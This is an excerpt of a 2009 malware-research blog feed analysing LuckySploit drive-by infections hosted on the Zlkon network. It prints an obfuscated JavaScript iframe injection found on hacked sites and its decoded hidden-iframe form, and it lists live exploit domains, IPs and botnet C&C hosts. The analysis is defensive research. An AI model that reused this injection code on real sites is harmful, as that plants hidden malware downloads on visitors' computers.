href='http://www.blogger.com/feeds/8434732598810973720/posts/default/4182474953384058765'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p3.html' title='Black Hat SEO - RBN Hacks, p.3'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-5536946330121228466</id><published>2009-04-09T14:38:00.001-07:00</published><updated>2009-04-10T08:15:50.371-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><title type='text'>Black Hat SEO - RBN Hacks, p.2</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  Welcome to LuckySploit:) ITS TOASTED&lt;br /&gt;  &lt;br /&gt;&lt;/p&gt;&lt;table width="549" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="549"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;WARNING&lt;/b&gt;: All sites listed on this page are dangerous (live URL with exploits) which lead &lt;br /&gt;to trojans beeing automatically installed on your computer.&lt;br /&gt;Do NOT visit them unless you know what you are doing. &lt;br /&gt;(only links are safe)&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;  &lt;p&gt;A nice article provided by Finjan about the Lucky Sploit toolkit, one of the &lt;br /&gt;  latest script kiddies that  cyber criminals used these days can be found  &lt;br /&gt;  following this link: &lt;a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2213" target="_blank"&gt;LuckySploit Toolkit Exposed&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Using well known technic such as &amp;quot;&lt;a href="http://www.finjan.com/Content.aspx?id=1456" target="_blank"&gt;Code Obfuscation&lt;/a&gt;&amp;quot; most often used to &lt;br /&gt;  hide its first intention (sometimes randomly generated), here is one of the &lt;br /&gt;  numerous malicious script found on several compromised website.&lt;br /&gt;&lt;/p&gt;  &lt;table width="508" height="119" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="504" height="86" style="padding:15px"&gt;&amp;lt;iframe src='http://url/' width='1' height='1' style='visibility: hidden;'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;&amp;lt;script&amp;gt;function c102916999516l4963660743084(l4963660743855){&lt;br /&gt;var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}&lt;br /&gt;function l4963660744fc7(l4963660745797){&lt;br /&gt;function l4963660746f0b(){return 2;}&lt;br /&gt;var l4963660745f69='';&lt;br /&gt;l4963660747eab=String.fromCharCode;&lt;br /&gt;for(l4963660746738=0;l4963660746738&amp;lt;l4963660745797.length;&lt;br /&gt;l4963660746738+=l4963660746f0b()){ &lt;br /&gt;l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(&lt;br /&gt;l4963660745797.substr(l4963660746738,l4963660746f0b()))));}&lt;br /&gt;return l4963660745f69;} &lt;br /&gt;var x60='';&lt;br /&gt;var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60&lt;br /&gt;+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x&lt;br /&gt;60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+&lt;br /&gt;'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+&lt;br /&gt;x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+&lt;br /&gt;'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+&lt;br /&gt;'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+&lt;br /&gt;'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+&lt;br /&gt;'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+&lt;br /&gt;x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+&lt;br /&gt;'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+&lt;br /&gt;'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+&lt;br /&gt;x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+&lt;br /&gt;'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+&lt;br /&gt;x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+&lt;br /&gt;x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+&lt;br /&gt;x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+&lt;br /&gt;x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+&lt;br /&gt;'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+&lt;br /&gt;x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+&lt;br /&gt;'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+&lt;br /&gt;x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+&lt;br /&gt;'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+&lt;br /&gt;'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+&lt;br /&gt;x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+&lt;br /&gt;'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));&lt;br /&gt;&amp;lt;/script&amp;gt; &lt;/td&gt;&lt;/tr&gt;  &lt;/table&gt;  &lt;br /&gt;  The deobfuscated result is:&lt;br /&gt;  &lt;br /&gt;  &lt;table width="513" height="119" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="509" height="86" style="padding:15px"&gt;&amp;lt;script&amp;gt;&lt;br /&gt;if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e&lt;br /&gt;%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%&lt;br /&gt;2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%&lt;br /&gt;68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%&lt;br /&gt;34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%&lt;br /&gt;65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%&lt;br /&gt;65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}&lt;br /&gt;var myia=true;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/td&gt;&lt;/tr&gt;  &lt;/table&gt;  &lt;br /&gt;            
  and then load the IFRAME.&lt;br /&gt;&lt;br /&gt;  &lt;table width="460" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="499" height="61" style="padding:15px"&gt;&amp;lt;iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'&amp;gt;&amp;lt;/iframe&amp;gt;&lt;/td&gt;&lt;/tr&gt;  &lt;/table&gt;  &lt;p&gt;Note that the script found in the second redirection show a lot of chat which refer &lt;br /&gt;    different IPs or hacking problems (IFRAME injected) &lt;a href="http://www.google.com/search?hl=en&amp;amp;q=&amp;quot;if(!myia)&amp;quot;%20iframe" target="_blank"&gt;Google search for &amp;quot;if(!myia)&amp;quot; iframe &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;An example of site on the same IP:&lt;br /&gt;&lt;br /&gt;&lt;span style="padding:15px"&gt;gogo2me.net&lt;/span&gt;resolve to &lt;span style="padding:15px"&gt;94.247.2.157 [hs.2-157.zlkon.lv]&lt;br /&gt;&lt;br /&gt; and then load an IFRAME (with the LuckySpoit)&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;  &lt;table width="536" height="63" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="532" height="61" style="padding:15px"&gt;hxxp://94.247.2.157/.dif/go.php?sid=1&lt;br /&gt;hxxp://94.247.2.157/.lck/?t=3&lt;br /&gt;hxxp://94.247.2.157/.lck/?t=6 &lt;br /&gt;http://94.247.2.157/.lck/?90f6ff8e287ae123...&lt;br /&gt;http://94.247.2.157/.lck/?75c4a0ecf4a4836...&lt;/td&gt;&lt;/tr&gt;  &lt;/table&gt;  &lt;p&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=53e2d900bba11fc1f78c011fbb8413f6&amp;amp;t=1232989747&amp;amp;type=js" target="_blank"&gt;Wepawet Analysis&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
  A &lt;a href="http://www.threatexpert.com/report.aspx?md5=8ac678d117c5ce0970f52903f8a610b0"&gt;ThreatExpert analysis&lt;/a&gt; also indicate the relationship with these viruses/malware:&lt;br /&gt;&lt;br /&gt;Zlob variant (&lt;a href="http://www.threatexpert.com/threats/trojan-spy-win32-zbot.html"&gt;Trojan-Spy.Win32.Zbot&lt;/a&gt;), keylogger's trojan (&lt;a href="http://www.threatexpert.com/threats/trojan-spy-zbot-yeth.html"&gt;Trojan-Spy.Zbot.YETH&lt;/a&gt;) and some&lt;br /&gt;TDSS (Alias Alureon) variant &lt;a href="http://www.threatexpert.com/threats/virus-win32-fasec.html"&gt;Win32.Fasec [Ikarus]&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/threats/virus-win32-fasec.html"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;    And here I just show you the line :) Also note the use of RSA algorithm (screenshot)&lt;br /&gt;&lt;/p&gt;  &lt;table width="333" height="119" border="1" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="329" height="86" style="padding:15px"&gt;nextkey = '';  &lt;br /&gt;k = '';&lt;br /&gt;attack_level = 0;&lt;br /&gt;try {&lt;br /&gt;f = '&lt;b&gt;Welcome to LuckySploit:) \n ITS TOASTED&lt;/b&gt;';&lt;br /&gt;}  catch (e){&lt;br /&gt;} &lt;/td&gt;&lt;/tr&gt;  &lt;/table&gt;    &lt;br /&gt;    &lt;p&gt;  &lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdsn8NE9EII/AAAAAAAAAYA/zcftPFwI31I/s1600-h/rsa-lucky-powned.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdsn8NE9EII/AAAAAAAAAYA/zcftPFwI31I/s320/rsa-lucky-powned.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321891299924447362" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;  &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5536946330121228466?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5536946330121228466'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/5536946330121228466'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/04/black-hat-seo-rbn-hacks-p2.html' title='Black Hat SEO - RBN Hacks, p.2'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_9YOi_bjoDL4/Sdsn8NE9EII/AAAAAAAAAYA/zcftPFwI31I/s72-c/rsa-lucky-powned.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-5389667171127975373</id><published>2009-04-09T14:34:00.000-07:00</published><updated>2009-04-19T11:51:12.722-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='hack website'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='fake av'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='rbn'/><category scheme='http://www.blogger.com/atom/ns#' term='javascript exploit'/><category scheme='http://www.blogger.com/atom/ns#' term='web poisoning'/><category scheme='http://www.blogger.com/atom/ns#' term='rogue av'/><category scheme='http://www.blogger.com/atom/ns#' term='iframe trojans'/><title type='text'>Black Hat SEO - RBN Hacks, p.1</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="572" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO, exploits, hacks, botnets&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Inspecting the bad network &lt;br /&gt;&lt;/p&gt;&lt;table width="543" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="543"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;WARNING&lt;/b&gt;: All sites listed on this page are dangerous (live URL with exploits) &lt;br /&gt; which lead  to trojans beeing automatically installed on your computer.&lt;br /&gt;Do NOT visit them unless you know what you are doing. &lt;br /&gt;(only links are safe)&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;p&gt;If you want information about desinfection check out this page:&lt;br /&gt;  &lt;a href="http://novirusthanks.org/blog/2009/03/analysis-of-a-website-infected-with-a-hidden-iframe/" target="_blank"&gt;Analysis of a website infected with a hidden iframe&lt;/a&gt; (by NoVirusThanks)&lt;br /&gt;  &lt;br /&gt;This doesn't include the desinfection of your website (attacked - iframed).&lt;br /&gt; &lt;br /&gt;For this change your passwords (windows passwords, FTP,  emails, database &lt;br /&gt;access etc.) and  remove the content injected on each page as quickly as possible&lt;br /&gt;(contact your hosting provider for assistance).&lt;br /&gt;&lt;br /&gt;This page reference domain found in thousand of compromised websites using&lt;br /&gt;obfuscated javascript code injected (IFRAME).&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;The Zlkon network (DATORU EXPRESS SERVISS) has been cited  in several blogs &lt;br /&gt; for hosting malicious content for cyber criminals - for example:&lt;br /&gt;&lt;br /&gt;On Symantec website for spreading the &lt;a href="http://www.symantec.com/en/us/security_response/writeup.jsp?docid=2008-121016-4048-99&amp;tabid=2" target="_blank"&gt;TDSS trojan&lt;/a&gt; [hs.2-104.zlkon.lv] - in conjunction &lt;br /&gt;with IPs at UkrTeleGroup Ltd.in December 2008&lt;br /&gt;&lt;br /&gt;85.255.115.156&lt;br /&gt;85.255.112.87&lt;br /&gt;85.255.115.50&lt;br /&gt;85.255.112.154&lt;br /&gt;&lt;br /&gt;On the &lt;a href="http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx" target="_blank"&gt;msmvps' blog&lt;/a&gt; for inaccurate whois details in January 2009&lt;br /&gt;On bluetack.co.uk forum for rogue antivirus &lt;a href="http://www.bluetack.co.uk/forums/index.php?showtopic=18064&amp;amp;st=210&amp;amp;p=90509&amp;amp;" target="_blank"&gt;here&lt;/a&gt; in January 2009&lt;br /&gt;Another example with &amp;quot;&lt;a href="http://www.raymond.cc/forum/spyware-viruses/9785-new-rogue-antivirus.html" target="_blank"&gt;Total Defender&lt;/a&gt;&amp;quot;, other rogue antivirus &lt;a href="http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt;Also found on several websites including fireeye &amp;quot;&lt;a href="http://blog.fireeye.com/research/2009/02/bad-actors-part-2-zlkon.html" target="_blank"&gt;Bad Actors Part 2 - ZlKon&lt;/a&gt;&amp;quot; &lt;br /&gt; - &lt;a href="http://ddanchev.blogspot.com/search?q=zlkon" target="_blank"&gt;dancho danchev's blog&lt;/a&gt; &lt;br /&gt; Network in conjunction cited here: &lt;a href="http://blogs.zdnet.com/security/?p=2764" target="_blank"&gt; Bad, bad, cybercrime-friendly ISPs!&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;A quick look at two IPs at Zlkon in Latvia &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;94.247.3.152 [hs.3-152.zlkon.lv]&lt;br /&gt;&lt;br /&gt;Using the dns &lt;br /&gt;&lt;br /&gt;ns1.freednshostserver.com [78.109.18.234]&lt;br /&gt;ns1.freednshostserver.com [78.109.18.235] &lt;br /&gt;&lt;br /&gt;descr: Datacenter Hosting.UA&lt;br /&gt;route: 78.109.16.0/20 &lt;br /&gt;origin: AS41665&lt;br /&gt;&lt;br /&gt;we have these domain currently live and kicking a lot of websites &lt;br /&gt;(simply enter a domain or &amp;quot;&lt;span class="trojans_luckysploit"&gt;in.cgi?cocacola&lt;/span&gt;&amp;quot; in google reveal a lot of chat related to &lt;br /&gt;hacked domain iframed.)&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="431" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;betstarwager.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&amp;amp;t=1239052803&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td width="266"&gt;&lt;span class="trojans_luckysploit"&gt;bestlotron.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td width="165"&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=60a1b098ebbd8a0a856e90100d9244e3&amp;amp;t=1239052609&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;denverfilmdigitalmedia.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=16d7159bfd0d418d6e06ab65f7d8d790&amp;amp;t=1239052806&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;diettopseek.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=44eb05a65e07e2b4a6a1b62fa7223e14&amp;amp;t=1239052811&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;filmlifemusicsite.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=e51f24301e2dfd7f50345f7e34a43542&amp;amp;t=1239240102&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;filmlifemusicsite.cn&lt;/span&gt;/&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=bbdcccf14f5edd00a9ad9c5a38bcd405&amp;amp;t=1237403830&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;filmtypemedia.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=d105fe8dbf2312a2acb0758753641453&amp;amp;t=1237293959&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;litedownloadseek.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=ac0f1c55cfee34869d00133fddf7be6c&amp;amp;t=1239052790&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;litetopfindworld.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=5b0a23d369d4e147ef587d57a1502a53&amp;amp;t=1239052785&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;litetoplocatesite.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=d881cfdc9c2ff0ed01417d02b5ca099f&amp;amp;t=1239052789&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;nanotopfind.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=ca10a92f348cc68315b5a77b61e6325a&amp;amp;t=1239052787&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;promixgroup.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=9dd3221d3789cb6adc758610a48ebb5a&amp;amp;t=1239052802&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;yourliteseek.cn/in.cgi?cocacola&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=2587c7959e1726de2ba36e2988c1a74d&amp;amp;t=1239052792&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;ghrgt.hostindianet.com/index.php&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=bbe9cd33895ddb68493a16f62350b287&amp;amp;t=1239052803&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;lieliteautobody.cn/load.php?id=4&lt;br /&gt;[94.247.3.151]  &lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=16e978b65ea02b6641566b279bd76918a" target="_blank"&gt;Anubis&lt;/a&gt; - &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=16e978b65ea02b6641566b279bd76918a" target="_blank"&gt;VirusTotal&lt;/a&gt;&lt;br /&gt;
Botnet C&amp;amp;C: 213.155.4.82&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/index.php?action=show_cluster&amp;amp;cluster_id=1175580"&gt;Anubis Family 1175580&lt;/a&gt;&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;ghrgt.hostindianet.com/cache/readme.pdf&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://wepawet.cs.ucsb.edu/view.php?type=js&amp;amp;hash=53174ae137690fab4987e35ad66c6989&amp;amp;t=1237602362" target="_blank"&gt;Analysis&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&lt;span class="trojans_luckysploit"&gt;zzzz.hostindianet.com/load.php?id=4&lt;/span&gt;&lt;/td&gt;  &lt;td&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=17853954c8943ac946177e41ebe0e066b" target="_blank"&gt;Anubis&lt;/a&gt; - &lt;a href="http://www.virustotal.com/analisis/385099e73f02b35dfe596adb177f0524" target="_blank"&gt;VirusTotal&lt;/a&gt; &lt;br /&gt;Botnet C&amp;amp;C: &lt;br /&gt;213.155.4.80&lt;br /&gt;78.109.30.224&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;  &lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="80" colspan="2"&gt;&lt;br /&gt;Also cited on Dancho Danchv's blog &lt;a href="http://ddanchev.blogspot.com/2009/03/azerbaijanian-embassies-in-pakistan-and.html" target="_blank"&gt;here&lt;/a&gt; in the serie of embassies websites iframed. (11 of them - including hostindianet[.]com) &lt;a href="http://wepawet.iseclab.org/view.php?hash=100c37951c22d9a6e2b22a10f802b65c&amp;amp;t=1236822958&amp;amp;type=js"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;
